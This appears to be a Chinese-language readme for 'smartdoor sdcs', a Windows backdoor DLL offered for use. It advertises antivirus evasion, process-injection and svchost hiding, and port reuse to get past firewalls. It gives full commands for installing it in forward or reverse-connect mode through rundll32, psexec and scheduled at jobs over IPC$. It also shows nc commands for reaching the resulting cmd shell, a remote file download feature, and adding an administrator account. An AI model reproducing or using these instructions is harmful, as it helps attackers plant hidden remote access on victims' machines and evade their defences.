智能门smartdoor sdcs v3.0 正+反弹后门介绍
--------------------------------------------------------------------------
1、特点:
1)服务端无进程
2)服务端无服务
3)两种启动隐藏方式:插入进程,svchost启动
4)两种模式:直连,反弹
5)稳定、小巧、免杀
6)反弹链接支持两种:域名(如花生壳绑定的机器域名,方便动态ip机器)和ip
7)部分端口复用:可复用绑定地址为inaddr_any型的程序,如可复用mysql的3306端口、443端口等。
用netstat -an查看localaddr为0.0.0.0地址对应的端口有复用的可能,如443可复用,但135、1025不可复用。
经网友测试部分iis可复用80端口。
通过把端口重绑定到防火墙开放的端口可实现穿越防火墙的功能。
适用平台:windows2000/xp/2003
过卡巴斯基,诺顿,瑞星等等杀毒软件。
--------------------------------------------------------------------------
2、服务端安装:
rundll32 后门名,install 模式(1为反弹,0为直连),端口,链接密码,ip或域名,服务名(填写则为svchost安装方式)
1)插入进程安装方式:
如:
反弹式安装:rundll32 sdcs.dll,install 1,123,dream2fly,192.168.2.22
直连式安装:rundll32 sdcs.dll,install 0,123,dream2fly
注意:3389中
你用下面的方法安装:
c:\winnt\system32>psexec \\127.0.0.1 -u administrator cmd.exe
或用at命令用计划任务安装:
net use \\127.0.0.1\ipc$ 密码 /user:用户名
at \\127.0.0.1 时间 rundll32 sdcs.dll,install 0,123,dream2fly
如3389中(请确认时间一定要准确,不要误写成明天的某个时间,用at查看定时任务是否正确。)
直连式安装:
net use \\127.0.0.1\ipc$ 123456 /user:administrator
at \\127.0.0.1 10:02 rundll32 sdcs.dll,install 0,123,dream2fly
反弹式安装:
net use \\127.0.0.1\ipc$ 123456 /user:administrator
at \\127.0.0.1 10:02 rundll32 sdcs.dll,install 1,123,dream2fly,192.168.2.22
2)svchost安装方式:
如:
反弹式安装:rundll32 sdcs.dll,install 1,123,dream2fly,192.168.2.22,iprip
直连式安装:rundll32 sdcs.dll,install 0,123,dream2fly,iprip
此安装方式3389不需要用at方式和psexe方式,直接安装有效。
--------------------------------------------------------------------------
3、服务端卸载: rundll32 sdcs.dll,uninstall(重启有效)
--------------------------------------------------------------------------
4、客户端链接方式:
正向:nc ip port
反向:nc -l -p port
如:
nc 192.168.2.22 123
nc -l -p 123
--------------------------------------------------------------------------
5、
1)获得cmdshell后可以执行所有dos命令,如net user admin 123 /add ,tasklist等等等等。
2)下载文件:
进入shell后,执行命令:get url filename
如get http://dream2fly.net/index.php index.txt
如get http://dream2fly.net/projects/smartkid.rar d:\smartkid.rar
--------------------------------------------------------------------------
6、faq:
1).在同一机器上重复安装必须更改dll名字和端口。
2).1为反弹模式,平时不开端口,只有连接时才开端口。
3).win2000的机器若“插入进程式”安装失败,可以用svchost安装方式
4)分部门端口复用和绑定服务器全部ip冲突,分两个版本发布,但是只发布端口服用版。如果您ipconfig /all发现
很多外网ip,且安装后绑定的那个ip你无法访问的话,那请联系我索取绑定服务器全部ip版。